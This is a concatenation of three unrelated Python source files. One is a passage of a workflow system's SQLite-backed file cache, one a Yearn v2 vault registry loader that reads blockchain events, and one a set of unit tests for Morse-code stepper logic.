self.cur.execute('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', absLocalFileName, fileID))
# And drop the file altogether
self.cur.execute('DELETE FROM files WHERE id = ?', (fileID,))
self.con.commit()
# Save the file to the job store right now
logger.debug('Actually executing upload for file %s', fileID)
self.jobStore.updateFile(fileID, absLocalFileName)
# Ship out the completed FileID object with its real size.
return FileID.forPath(fileID, absLocalFileName)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
if not isinstance(fileStoreID, FileID):
# Don't let the user forge File IDs.
raise TypeError('Received file ID not of type FileID: {}'.format(fileStoreID))
if fileStoreID in self.filesToDelete:
# File has already been deleted
raise FileNotFoundError('Attempted to read deleted file: {}'.format(fileStoreID))
if userPath is not None:
# Validate the destination we got
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
raise RuntimeError(' File %s ' % localFilePath + ' exists. Cannot Overwrite.')
else:
# Make our own destination
localFilePath = self.getLocalTempFileName()
# Work out who we are
pid = os.getpid()
# And what job we are operating on behalf of
readerID = self.jobGraph.jobStoreID
if cache:
# We want to use the cache
if mutable:
return self._readGlobalFileMutablyWithCache(fileStoreID, localFilePath, readerID)
else:
return self._readGlobalFileWithCache(fileStoreID, localFilePath, symlink, readerID)
else:
# We do not want to use the cache
return self._readGlobalFileWithoutCache(fileStoreID, localFilePath, mutable, symlink, readerID)
def _readGlobalFileWithoutCache(self, fileStoreID, localFilePath, mutable, symlink, readerID):
"""
Read a file without putting it into the cache.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str localFilePath: absolute destination path. Already known not to exist.
:param bool mutable: Whether a mutable copy should be created, instead of a hard link or symlink.
:param bool symlink: Whether a symlink is acceptable.
:param str readerID: Job ID of the job reading the file.
:return: An absolute path to a local, temporary copy of or link to the file keyed by fileStoreID.
:rtype: str
"""
# We would like to read directly from the backing job store, since
# we don't want to cache the result. However, we may be trying to
# read a file that is 'uploadable' or 'uploading' and hasn't hit
# the backing job store yet.
# Try and make a 'copying' reference to such a file
self.cur.execute('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND (state = ? OR state = ?)',
(localFilePath, readerID, 'copying', fileStoreID, 'uploadable', 'uploading'))
self.con.commit()
# See if we got it
have_reference = False
for row in self.cur.execute('SELECT COUNT(*) FROM refs WHERE path = ? and file_id = ?', (localFilePath, fileStoreID)):
have_reference = row[0] > 0
if have_reference:
# If we succeed, copy the file. We know the job has space for it
# because if we didn't do this we'd be getting a fresh copy from
# the job store.
# Find where the file is cached
cachedPath = None
for row in self.cur.execute('SELECT path FROM files WHERE id = ?', (fileStoreID,)):
cachedPath = row[0]
if cachedPath is None:
raise RuntimeError('File %s went away while we had a reference to it!' % fileStoreID)
with open(localFilePath, 'wb') as outStream:
with open(cachedPath, 'rb') as inStream:
# Copy it
shutil.copyfileobj(inStream, outStream)
# Change the reference to mutable
self.cur.execute('UPDATE refs SET state = ? WHERE path = ? and file_id = ?', ('mutable', localFilePath, fileStoreID))
self.con.commit()
else:
# If we fail, the file isn't cached here in 'uploadable' or
# 'uploading' state, so that means it must actually be in the
# backing job store, so we can get it from the backing job store.
# Create a 'mutable' reference (even if we end up with a link)
# so we can see this file in deleteLocalFile.
self.cur.execute('INSERT INTO refs VALUES (?, ?, ?, ?)',
(localFilePath, fileStoreID, readerID, 'mutable'))
self.con.commit()
# Just read directly
if mutable or self.forceNonFreeCaching:
# Always copy
with open(localFilePath, 'wb') as outStream:
with self.jobStore.readFileStream(fileStoreID) as inStream:
shutil.copyfileobj(inStream, outStream)
else:
# Link or maybe copy
self.jobStore.readFile(fileStoreID, localFilePath, symlink=symlink)
# Now we got the file, somehow.
return localFilePath
def _downloadToCache(self, fileStoreID, cachedPath):
"""
Copy a file from the file store into the cache.
Will hardlink if appropriate.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str cachedPath: absolute destination path in the cache. Already known not to exist.
"""
if self.forceNonFreeCaching:
# Always copy
with open(cachedPath, 'wb') as outStream:
with self.jobStore.readFileStream(fileStoreID) as inStream:
shutil.copyfileobj(inStream, outStream)
else:
# Link or maybe copy
self.jobStore.readFile(fileStoreID, cachedPath, symlink=False)
def _readGlobalFileMutablyWithCache(self, fileStoreID, localFilePath, readerID):
"""
Read a mutable copy of a file, putting it into the cache if possible.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str localFilePath: absolute destination path. Already known not to exist.
:param str readerID: Job ID of the job reading the file.
:return: An absolute path to a local, temporary copy of or link to the file keyed by fileStoreID.
:rtype: str
"""
# Work out who we are
pid = os.getpid()
# Work out where to cache the file if it isn't cached already
cachedPath = self._getNewCachingPath(fileStoreID)
# Start a loop until we can do one of these
while True:
# Try and create a downloading entry if no entry exists
logger.debug('Trying to make file record for id %s', fileStoreID)
self.cur.execute('INSERT OR IGNORE INTO files VALUES (?, ?, ?, ?, ?)',
(fileStoreID, cachedPath, fileStoreID.size, 'downloading', pid))
self.con.commit()
# See if we won the race
self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND state = ? AND owner = ?', (fileStoreID, 'downloading', pid))
if self.cur.fetchone()[0] > 0:
# We are responsible for downloading the file
logger.debug('We are now responsible for downloading file %s', fileStoreID)
# Make sure we have space for this download.
self._freeUpSpace()
# Do the download into the cache.
self._downloadToCache(fileStoreID, cachedPath)
# Now, we may have to immediately give away this file, because
# we don't have space for two copies.
# If so, we can't let it go to cached state, because someone
# else might make a reference to it, and we may get stuck with
# two readers, one cached copy, and space for two copies total.
# Make the copying reference
self.cur.execute('INSERT INTO refs VALUES (?, ?, ?, ?)',
(localFilePath, fileStoreID, readerID, 'copying'))
self.con.commit()
# Fulfill it with a full copy or by giving away the cached copy
self._fulfillCopyingReference(fileStoreID, cachedPath, localFilePath)
# Now we're done
return localFilePath
else:
logger.debug('Someone else is already responsible for file %s', fileStoreID)
# A record already existed for this file.
# Try and create an immutable or copying reference to an entry that
# is in 'cached' or 'uploadable' or 'uploading' state.
# It might be uploading because *we* are supposed to be uploading it.
logger.debug('Trying to make reference to file %s', fileStoreID)
self.cur.execute('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND (state = ? OR state = ? OR state = ?)',
(localFilePath, readerID, 'copying', fileStoreID, 'cached', 'uploadable', 'uploading'))
self.con.commit()
# See if we got it
self.cur.execute('SELECT COUNT(*) FROM refs WHERE path = ? and file_id = ?', (localFilePath, fileStoreID))
if self.cur.fetchone()[0] > 0:
# The file is cached and we can copy or link it
logger.debug('Obtained reference to file %s', fileStoreID)
# Get the path it is actually at in the cache, instead of where we wanted to put it
for row in self.cur.execute('SELECT path FROM files WHERE id = ?', (fileStoreID,)):
cachedPath = row[0]
while self.getCacheAvailable() < 0:
# Since we now have a copying reference, see if we have used too much space.
# If so, try to free up some space by deleting or uploading, but
# don't loop forever if we can't get enough.
self._tryToFreeUpSpace()
if self.getCacheAvailable() >= 0:
# We made room
break
# See if we have no other references and we can give away the file.
# Change it to downloading owned by us if we can grab it.
self.cur.execute("""
UPDATE files SET files.owner = ?, files.state = ? WHERE files.id = ? AND files.state = ?
AND files.owner IS NULL AND NOT EXISTS (
SELECT NULL FROM refs WHERE refs.file_id = files.id AND refs.state != 'mutable'
)
""",
(pid, 'downloading', fileStoreID, 'cached'))
self.con.commit()
if self._giveAwayDownloadingFile(fileStoreID, cachedPath, localFilePath):
# We got ownership of the file and managed to give it away.
return localFilePath
# If we don't have space, and we couldn't make space, and we
# couldn't get exclusive control of the file to give it away, we
# need to wait for one of those people with references to the file
# to finish and give it up.
# TODO: work out if that will never happen somehow.
# OK, now we have space to make a copy. Do it
shutil.copyfile(cachedPath, localFilePath)
# Change the reference to mutable
self.cur.execute('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', localFilePath, fileStoreID))
self.con.commit()
# Now we're done
return localFilePath
else:
# We didn't get a reference. Maybe it is still downloading.
logger.debug('Could not obtain reference to file %s', fileStoreID)
# Loop around again and see if either we can download it or we can get a reference to it.
# If we didn't get a download or a reference, adopt and do work
# from dead workers and loop again.
# We may have to wait for someone else's download or delete to
# finish. If they die, we will notice.
self._removeDeadJobs(self.con)
self._stealWorkFromTheDead()
self._executePendingDeletions(self.con, self.cur)
def _fulfillCopyingReference(self, fileStoreID, cachedPath, localFilePath):
"""
For use when you own a file in 'downloading' state, and have a
'copying' reference to it.
Makes a full copy from the cache, and changes 'downloading' file state
to 'cached', if space can be found, or gives away the cached copy if
space cannot be found.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str cachedPath: absolute source path in the cache.
:param str localFilePath: absolute destination path. Already known not to exist.
"""
if self.getCacheAvailable() < 0:
self._tryToFreeUpSpace()
if self.getCacheAvailable() < 0:
# No space for the cached copy and this copy. Give this copy away.
assert self._giveAwayDownloadingFile(fileStoreID, cachedPath, localFilePath)
return
# Otherwise we have space for the cached copy and the user copy.
# Expose this file as cached so other people can copy off of it too.
# Change state from downloading to cached
self.cur.execute('UPDATE files SET state = ?, owner = NULL WHERE id = ?',
('cached', fileStoreID))
self.con.commit()
# Make our copy
shutil.copyfile(cachedPath, localFilePath)
# Change our reference to mutable
self.cur.execute('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', localFilePath, fileStoreID))
self.con.commit()
# Now we're done
return
def _giveAwayDownloadingFile(self, fileStoreID, cachedPath, localFilePath):
"""
Move a downloaded file in 'downloading' state, owned by us, from the cache to a user-specified destination path.
Used when there's no room for both a cached copy of the file and the user's actual mutable copy.
Returns true if the file was moved, and false if the file was not owned by us in 'downloading' state.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str cachedPath: absolute source path in the cache.
:param str localFilePath: absolute destination path. Already known not to exist.
:return: True if the file is successfully moved. False if the file is not owned by us in 'downloading' state.
:rtype: bool
"""
# Work out who we are
pid = os.getpid()
# See if we actually own this file and can giove it away
self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND state = ? AND owner = ?',
(fileStoreID, 'downloading', pid))
if self.cur.fetchone()[0] > 0:
# Now we have exclusive control of the cached copy of the file, so we can give it away.
# We are giving it away
shutil.move(cachedPath, localFilePath)
# Record that.
self.cur.execute('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', localFilePath, fileStoreID))
self.cur.execute('DELETE FROM files WHERE id = ?', (fileStoreID,))
# Now we're done
return True
else:
# We don't own this file in 'downloading' state
return False
def _createLinkFromCache(self, cachedPath, localFilePath, symlink=True):
"""
Create a hardlink or symlink from the given path in the cache to the
given user-provided path. Destination must not exist.
Only creates a symlink if a hardlink cannot be created and symlink is
true.
If no link can be created, returns False. Otherwise, returns True.
:param str cachedPath: absolute source path in the cache.
:param str localFilePath: absolute destination path. Already known not to exist.
:param bool symlink: True if a symlink is allowed, False otherwise.
:return: True if the file is successfully linked. False if the file cannot be linked.
:rtype: bool
"""
try:
# Try and make the hard link.
os.link(cachedPath, localFilePath)
return True
except OSError:
if symlink:
# Or symlink
try:
os.symlink(cachedPath, localFilePath)
return True
except OSError:
return False
else:
return False
def _readGlobalFileWithCache(self, fileStoreID, localFilePath, symlink, readerID):
"""
Read a file, putting it into the cache if possible.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str localFilePath: absolute destination path. Already known not to exist.
:param bool symlink: Whether a symlink is acceptable.
:param str readerID: Job ID of the job reading the file.
:return: An absolute path to a local, temporary copy of or link to the file keyed by fileStoreID.
:rtype: str
"""
# Now we know to use the cache, and that we don't require a mutable copy.
# Work out who we are
pid = os.getpid()
# Work out where to cache the file if it isn't cached already
cachedPath = self._getNewCachingPath(fileStoreID)
# Start a loop until we can do one of these
while True:
# Try and create a downloading entry if no entry exists
logger.debug('Trying to make file record for id %s', fileStoreID)
self.cur.execute('INSERT OR IGNORE INTO files VALUES (?, ?, ?, ?, ?)',
(fileStoreID, cachedPath, fileStoreID.size, 'downloading', pid))
# Make sure to create a reference at the same time if it succeeds, to bill it against our job's space.
# Don't create the mutable reference yet because we might not necessarily be able to clear that space.
logger.debug('Trying to make file reference to %s', fileStoreID)
self.cur.execute('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND state = ? AND owner = ?',
(localFilePath, readerID, 'immutable', fileStoreID, 'downloading', pid))
self.con.commit()
# See if we won the race
self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND state = ? AND owner = ?', (fileStoreID, 'downloading', pid))
if self.cur.fetchone()[0] > 0:
# We are responsible for downloading the file (and we have the reference)
logger.debug('We are now responsible for downloading file %s', fileStoreID)
# Make sure we have space for this download.
self._freeUpSpace()
# Do the download into the cache.
self._downloadToCache(fileStoreID, cachedPath)
# Try and make the link before we let the file go to cached state.
# If we fail we may end up having to give away the file we just downloaded.
if self._createLinkFromCache(cachedPath, localFilePath, symlink):
# We made the link!
# Change file state from downloading to cached so other people can use it
self.cur.execute('UPDATE files SET state = ?, owner = NULL WHERE id = ?',
('cached', fileStoreID))
self.con.commit()
# Now we're done!
return localFilePath
else:
# We could not make a link. We need to make a copy.
# Change the reference to copying.
self.cur.execute('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('copying', localFilePath, fileStoreID))
self.con.commit()
# Fulfill it with a full copy or by giving away the cached copy
self._fulfillCopyingReference(fileStoreID, cachedPath, localFilePath)
# Now we're done
return localFilePath
else:
logger.debug('Someone else is already responsible for file %s', fileStoreID)
# A record already existed for this file.
# Try and create an immutable reference to an entry that
# is in 'cached' or 'uploadable' or 'uploading' state.
# It might be uploading because *we* are supposed to be uploading it.
logger.debug('Trying to make reference to file %s', fileStoreID)
self.cur.execute('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND (state = ? OR state = ? OR state = ?)',
(localFilePath, readerID, 'immutable', fileStoreID, 'cached', 'uploadable', 'uploading'))
self.con.commit()
# See if we got it
self.cur.execute('SELECT COUNT(*) FROM refs WHERE path = ? and file_id = ?', (localFilePath, fileStoreID))
if self.cur.fetchone()[0] > 0:
# The file is cached and we can copy or link it
logger.debug('Obtained reference to file %s', fileStoreID)
# Get the path it is actually at in the cache, instead of where we wanted to put it
for row in self.cur.execute('SELECT path FROM files WHERE id = ?', (fileStoreID,)):
cachedPath = row[0]
if self._createLinkFromCache(cachedPath, localFilePath, symlink):
# We managed to make the link
return localFilePath
else:
# We can't make the link. We need a copy instead.
# We could change the reference to copying, see if
# there's space, make the copy, try and get ahold of
# the file if there isn't space, and give it away, but
# we already have code for that for mutable downloads,
# so just clear the reference and download mutably.
self.cur.execute('DELETE FROM refs WHERE path = ? AND file_id = ?', (localFilePath, fileStoreID))
self.con.commit()
return self._readGlobalFileMutablyWithCache(fileStoreID, localFilePath, readerID)
else:
logger.debug('Could not obtain reference to file %s', fileStoreID)
# If we didn't get a download or a reference, adopt and do work from dead workers and loop again.
# We may have to wait for someone else's download or delete to
# finish. If they die, we will notice.
self._removeDeadJobs(self.con)
self._stealWorkFromTheDead()
self._executePendingDeletions(self.con, self.cur)
def readGlobalFileStream(self, fileStoreID):
if not isinstance(fileStoreID, FileID):
# Don't let the user forge File IDs.
raise TypeError('Received file ID not of type FileID: {}'.format(fileStoreID))
if fileStoreID in self.filesToDelete:
# File has already been deleted
raise FileNotFoundError('Attempted to read deleted file: {}'.format(fileStoreID))
# TODO: can we fulfil this from the cache if the file is in the cache?
# I think we can because if a job is keeping the file data on disk due to having it open, it must be paying for it itself.
return self.jobStore.readFileStream(fileStoreID)
def deleteLocalFile(self, fileStoreID):
if not isinstance(fileStoreID, FileID):
# Don't let the user forge File IDs.
raise TypeError('Received file ID not of type FileID: {}'.format(fileStoreID))
# What job are we operating as?
jobID = self.jobID
# What paths did we delete
deleted = []
# What's the first path, if any, that was missing? If we encounter a
# missing ref file, we will raise an error about it and stop deleting
# things.
missingFile = None
for row in self.cur.execute('SELECT path FROM refs WHERE file_id = ? AND job_id = ?', (fileStoreID, jobID)):
# Delete all the files that are references to this cached file (even mutable copies)
path = row[0]
if path.startswith(self.localTempDir):
# It is actually in the local temp dir where we are supposed to be deleting things
try:
os.remove(path)
except FileNotFoundError as err:
if err.errno != errno.ENOENT:
# Something else went wrong
raise
# Otherwise, file is missing, but that's fine.
missingFile = path
break
deleted.append(path)
for path in deleted:
# Drop the references
self.cur.execute('DELETE FROM refs WHERE file_id = ? AND job_id = ? AND path = ?', (fileStoreID, jobID, path))
self.con.commit()
# Now space has been revoked from the cache because that job needs its space back.
# That might result in stuff having to be evicted.
self._freeUpSpace()
if missingFile is not None:
# Now throw an error about the file we couldn't find to delete, if
# any. TODO: Only users who know to call deleteLocalFile will ever
# see this. We also should check at the end of the job to make
# sure all the refs are intact.
raise IllegalDeletionCacheError(missingFile)
def deleteGlobalFile(self, fileStoreID):
if not isinstance(fileStoreID, FileID):
# Don't let the user forge File IDs.
raise TypeError('Received file ID not of type FileID: {}'.format(fileStoreID))
# Delete local copies for this job
self.deleteLocalFile(fileStoreID)
# Work out who we are
pid = os.getpid()
# Make sure nobody else has references to it
for row in self.cur.execute('SELECT job_id FROM refs WHERE file_id = ? AND state != ?', (fileStoreID, 'mutable')):
raise RuntimeError('Deleted file ID %s which is still in use by job %s' % (fileStoreID, row[0]))
# TODO: should we just let other jobs and the cache keep the file until
# it gets evicted, and only delete at the back end?
# Pop the file into deleting state owned by us if it exists
self.cur.execute('UPDATE files SET state = ?, owner = ? WHERE id = ?', ('deleting', pid, fileStoreID))
self.con.commit()
# Finish the delete if the file is present
self._executePendingDeletions(self.con, self.cur)
# Add the file to the list of files to be deleted from the job store
# once the run method completes.
self.filesToDelete.add(fileStoreID)
self.logToMaster('Added file with ID \'%s\' to the list of files to be' % fileStoreID +
' globally deleted.', level=logging.DEBUG)
def exportFile(self, jobStoreFileID, dstUrl):
# First we need to make sure the file is actually in the job store if
# we have it cached and need to upload it.
# We don't have to worry about the case where a different process is
# uploading it because we aren't supposed to have the ID from them
# until they are done.
# For safety and simplicity, we just execute all pending uploads now.
self._executePendingUploads(self.con, self.cur)
# Then we let the job store export. TODO: let the export come from the
# cache? How would we write the URL?
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def waitForCommit(self):
# We need to block on the upload thread.
# We may be called even if startCommit is not called. In that
# case, a new instance of this class should have been created by the
# worker and ought to pick up all our work by PID via the database, and
# this instance doesn't actually have to commit.
if self.commitThread is not None:
self.commitThread.join()
return True
def startCommit(self, jobState=False):
# If we already started a commit (maybe with a different parameter
# value?) wait on it, so we can't forget to join it later.
self.waitForCommit()
# Start the commit thread
self.commitThread = threading.Thread(target=self.startCommitThread, args=(jobState,))
self.commitThread.start()
def startCommitThread(self, jobState):
"""
Run in a thread to actually commit the current job.
"""
# Make sure the previous job is committed, if any
if self.waitForPreviousCommit is not None:
self.waitForPreviousCommit()
try:
# Reconnect to the database from this thread. The main thread can
# keep using self.con and self.cur. We need to do this because
# SQLite objects are tied to a thread.
con = sqlite3.connect(self.dbPath)
cur = con.cursor()
logger.debug('Committing file uploads asynchronously')
# Finish all uploads
self._executePendingUploads(con, cur)
# Finish all deletions out of the cache (not from the job store)
self._executePendingDeletions(con, cur)
if jobState:
# Do all the things that make this job not redoable
logger.debug('Committing file deletes and job state changes asynchronously')
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
# Update, removing emptying files to delete
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The cache directory, containing cache state database.
Job local temp directories will be removed due to their appearance
in the database.
"""
# We don't have access to a class instance, nor do we have access to
# the workflow attempt number that we would need in order to find the
# right database. So we rely on this hard link to the most recent
# database.
dbPath = os.path.join(dir_, 'cache.db')
if os.path.exists(dbPath):
try:
# The database exists, see if we can open it
con = sqlite3.connect(dbPath)
except:
# Probably someone deleted it.
pass
else:
# We got a database connection
# Create the tables if they don't exist so deletion of dead
# jobs won't fail.
cls._ensureTables(con)
# Remove dead jobs
cls._removeDeadJobs(con)
con.close()
if os.path.exists(dir_) and os.path.isdir(dir_):
# Delete the state DB and everything cached.
robust_rmtree(dir_)
def __del__(self):
"""
Cleanup function that is run when destroying the class instance that ensures that all the
file writing threads exit.
"""
self.waitForCommit()
@classmethod
def _removeDeadJobs(cls, con):
"""
Look at the state of all jobs registered in the database, and handle them
(clean up the disk)
:param sqlite3.Connection con: Connection to the cache database.
"""
# Get a cursor
cur = con.cursor()
# Work out our PID for taking ownership of jobs
pid = os.getpid()
# Get all the dead worker PIDs
workers = []
for row in cur.execute('SELECT DISTINCT worker FROM jobs WHERE worker IS NOT NULL'):
workers.append(row[0])
# Work out which of them are not currently running.
# TODO: account for PID reuse somehow.
deadWorkers = []
for worker in workers:
if not cls._pidExists(worker):
deadWorkers.append(worker)
# Now we know which workers are dead.
# Clear them off of the jobs they had.
for deadWorker in deadWorkers:
cur.execute('UPDATE jobs SET worker = NULL WHERE worker = ?', (deadWorker,))
con.commit()
if len(deadWorkers) > 0:
logger.debug('Reaped %d dead workers', len(deadWorkers))
while True:
# Find an unowned job.
# Don't take all of them; other people could come along and want to help us with the other jobs.
cur.execute('SELECT id FROM jobs WHERE worker IS NULL LIMIT 1')
row = cur.fetchone()
if row is None:
# We cleaned up all the jobs
break
jobID = row[0]
# Try to own this job
cur.execute('UPDATE jobs SET worker = ? WHERE id = ? AND worker IS NULL', (pid, jobID))
con.commit()
# See if we won the race
cur.execute('SELECT id, tempdir FROM jobs WHERE id = ? AND worker = ?', (jobID, pid))
row = cur.fetchone()
if row is None:
# We didn't win the race. Try another one.
continue
# If we did win, delete the job and its files and temp dir
cls._removeJob(con, cur, jobID)
logger.debug('Cleaned up orphanded job %s', jobID)
# Now we have cleaned up all the jobs that belonged to dead workers that were dead when we entered this function.
|
registry.py
|
import logging
import threading
import time
from typing import List
from brownie import Contract, chain, web3
from joblib import Parallel, delayed
from web3._utils.abi import filter_by_name
from web3._utils.events import construct_event_topic_set
from yearn.events import create_filter, decode_logs, get_logs_asap
from yearn.multicall2 import fetch_multicall
from yearn.prices import magic
from yearn.utils import Singleton, contract_creation_block, contract
from yearn.v2.vaults import Vault
from yearn.networks import Network
from yearn.exceptions import UnsupportedNetwork
from yearn.decorators import sentry_catch_all, wait_or_exit_before, wait_or_exit_after
logger = logging.getLogger(__name__)
class Registry(metaclass=Singleton):
def __init__(self, watch_events_forever=True):
self.releases = {} # api_version => template
self._vaults = {} # address -> Vault
self._experiments = {} # address => Vault
self.governance = None
self.tags = {}
self._watch_events_forever = watch_events_forever
self.registries = self.load_registry()
# load registry state in the background
self._done = threading.Event()
self._has_exception = False
self._thread = threading.Thread(target=self.watch_events, daemon=True)
self._thread.start()
def load_registry(self):
if chain.id == Network.Mainnet:
return self.load_from_ens()
elif chain.id == Network.Fantom:
return [contract('0x727fe1759430df13655ddb0731dE0D0FDE929b04')]
elif chain.id == Network.Arbitrum:
return [contract('0x3199437193625DCcD6F9C9e98BDf93582200Eb1f')]
else:
raise UnsupportedNetwork('yearn v2 is not available on this network')
def load_from_ens(self):
# track older registries to pull experiments
resolver = contract('0x4976fb03C32e5B8cfe2b6cCB31c09Ba78EBaBa41')
topics = construct_event_topic_set(
filter_by_name('AddressChanged', resolver.abi)[0],
web3.codec,
{'node': web3.ens.namehash('v2.registry.ychad.eth')},
)
events = decode_logs(get_logs_asap(str(resolver), topics))
logger.info('loaded %d registry versions', len(events))
return [Contract(event['newAddress']) for event in events]
@property
@wait_or_exit_before
def vaults(self) -> List[Vault]:
return list(self._vaults.values())
@property
@wait_or_exit_before
def experiments(self) -> List[Vault]:
return list(self._experiments.values())
@wait_or_exit_before
def __repr__(self) -> str:
return f"<Registry chain={chain.id} releases={len(self.releases)} vaults={len(self.vaults)} experiments={len(self.experiments)}>"
@wait_or_exit_after
def load_vaults(self):
if not self._thread._started.is_set():
self._thread.start()
@sentry_catch_all
def watch_events(self):
start = time.time()
self.log_filter = create_filter([str(addr) for addr in self.registries])
logs = self.log_filter.get_all_entries()
while True:
self.process_events(decode_logs(logs))
if not self._done.is_set():
self._done.set()
logger.info("loaded v2 registry in %.3fs", time.time() - start)
if not self._watch_events_forever:
return
time.sleep(300)
# read new logs at end of loop
logs = self.log_filter.get_new_entries()
def process_events(self, events):
for event in events:
logger.debug("%s %s %s", event.address, event.name, dict(event))
if event.name == "NewGovernance":
self.governance = event["governance"]
if event.name == "NewRelease":
self.releases[event["api_version"]] = contract(event["template"])
if event.name == "NewVault":
# experiment was endorsed
if event["vault"] in self._experiments:
vault = self._experiments.pop(event["vault"])
vault.name = f"{vault.vault.symbol()} {event['api_version']}"
self._vaults[event["vault"]] = vault
logger.debug("endorsed vault %s %s", vault.vault, vault.name)
# we already know this vault from another registry
elif event["vault"] not in self._vaults:
vault = self.vault_from_event(event)
vault.name = f"{vault.vault.symbol()} {event['api_version']}"
self._vaults[event["vault"]] = vault
logger.debug("new vault %s %s", vault.vault, vault.name)
if event.name == "NewExperimentalVault":
vault = self.vault_from_event(event)
vault.name = f"{vault.vault.symbol()} {event['api_version']} {event['vault'][:8]}"
self._experiments[event["vault"]] = vault
logger.debug("new experiment %s %s", vault.vault, vault.name)
if event.name == "VaultTagged":
self.tags[event["vault"]] = event["tag"]
def vault_from_event(self, event):
return Vault(
vault=Contract.from_abi("Vault", event["vault"], self.releases[event["api_version"]].abi),
token=event["token"],
api_version=event["api_version"],
registry=self,
watch_events_forever=self._watch_events_forever,
)
def load_strategies(self):
# stagger loading strategies to not run out of connections in the pool
vaults = self.vaults + self.experiments
Parallel(8, "threading")(delayed(vault.load_strategies)() for vault in vaults)
def load_harvests(self):
vaults = self.vaults + self.experiments
Parallel(8, "threading")(delayed(vault.load_harvests)() for vault in vaults)
def describe(self, block=None):
vaults = self.active_vaults_at(block)
results = Parallel(8, "threading")(delayed(vault.describe)(block=block) for vault in vaults)
return {vault.name: result for vault, result in zip(vaults, results)}
def total_value_at(self, block=None):
vaults = self.active_vaults_at(block)
prices = Parallel(8, "threading")(delayed(magic.get_price)(str(vault.token), block=block) for vault in vaults)
results = fetch_multicall(*[[vault.vault, "totalAssets"] for vault in vaults], block=block)
return {vault.name: assets * price / vault.scale for vault, assets, price in zip(vaults, results, prices)}
def active_vaults_at(self, block=None):
vaults = self.vaults + self.experiments
if block:
vaults = [vault for vault in vaults if contract_creation_block(str(vault.vault)) <= block]
# fixes edge case: a vault is not necessarily initialized on creation
activations = fetch_multicall(*[[vault.vault, 'activation'] for vault in vaults], block=block)
return [vault for vault, activation in zip(vaults, activations) if activation]
def wallets(self, block=None):
return set(vault.wallets(block) for vault in self.active_vaults_at(block))
|
test_logics.py
|
# -*- coding: utf-8 -*-
import unittest
from unittest.mock import patch, MagicMock
from asterisk_mirror.logics import AsteriskLogic, MorseLogic, YearLogic
from asterisk_mirror.stepper import Stepper
import time
from threading import Thread
from datetime import datetime
class TestAsteriskLogic(unittest.TestCase):
def test_logic_execution(self):
stepper = Stepper()
logic = AsteriskLogic(stepper)
logic.execute = MagicMock()
thread = Thread(target=logic.run)
thread.start()
time.sleep(0.01)
logic.execute.assert_called()
stepper.interrupt()
class TestMorseLogic(unittest.TestCase):
# https://cryptii.com/morse-code-translator
test_morses = {
"SOS": "... --- ...",
"asterisk": ".- ... - . .-. .. ... -.-",
"1234567890": ".---- ..--- ...-- ....- ..... -.... --... ---.. ----. -----",
".,!?-/()&:;=+_\"@":
".-.-.- --..-- -.-.-- ..--.. -....- -..-. -.--. -.--.- .-... ---... -.-.-. -...- .-.-. ..--.- .-..-. .--.-.",
"The quick brown fox jumps over 13 lazy dogs.":
"- .... . / --.- ..- .. -.-. -.- / -... .-. --- .-- -. / ..-. --- -..- / .--- ..- -- .--. ... / --- ...- . .-. / .---- ...-- / .-.. .- --.. -.-- / -.. --- --. ... .-.-.-",
"h.o (hdoto) is an artist group based in Linz, Tokyo and Osaka.":
".... .-.-.- --- / -.--. .... -.. --- - --- -.--.- / .. ... / .- -. / .- .-. - .. ... - / --. .-. --- ..- .--. / -... .- ... . -.. / .. -. / .-.. .. -. --.. --..-- / - --- -.- -.-- --- / .- -. -.. / --- ... .- -.- .- .-.-.-"
}
def test_encode_morse(self):
for message, morse in self.test_morses.items():
logic = MorseLogic(Stepper())
logic.set_message(message)
assert logic.morse == morse
def test_execute(self):
def add_rotate_steps(rotate_steps:int, speed: float):
#print("steps: ", rotate_steps, flush=True)
self.rotate_steps += rotate_steps
def add_wait_duration(wait_duration:float):
#print("wait: ", wait_duration, flush=True)
self.wait_duration += wait_duration
with patch('asterisk_mirror.stepper.Stepper') as StepperMock:
stepper = StepperMock()
stepper.is_interrupted.return_value = False
stepper.rotate_by_steps.side_effect = add_rotate_steps
stepper.wait.side_effect = add_wait_duration
stepper.base_time = 0.001
for message, morse in self.test_morses.items():
self.rotate_steps = 0
self.wait_duration = 0
#print("message:", message)
logic = MorseLogic(stepper)
logic.set_message(message)
logic.execute()
# dot: 1, dash: 3, inter-elem: 1, inter-letters: 3, inter-words: 7
# steps = dot+dash*3
rotate_steps = (morse.count('.') + morse.count('-')*3) * logic.dot_steps
# wait_duration = dot*2 + dash*4 + space*2 + slash*4
duration = morse.count('.')*2 + morse.count('-')*4 + morse.count(' ')*2 + morse.count('/')*4 + 8
#print("wait:", self.wait_duration, ", steps:", self.rotate_steps)
#print("duration:", int(round(self.wait_duration/logic.dot_interval)+self.rotate_steps/logic.dot_steps), "->", duration)
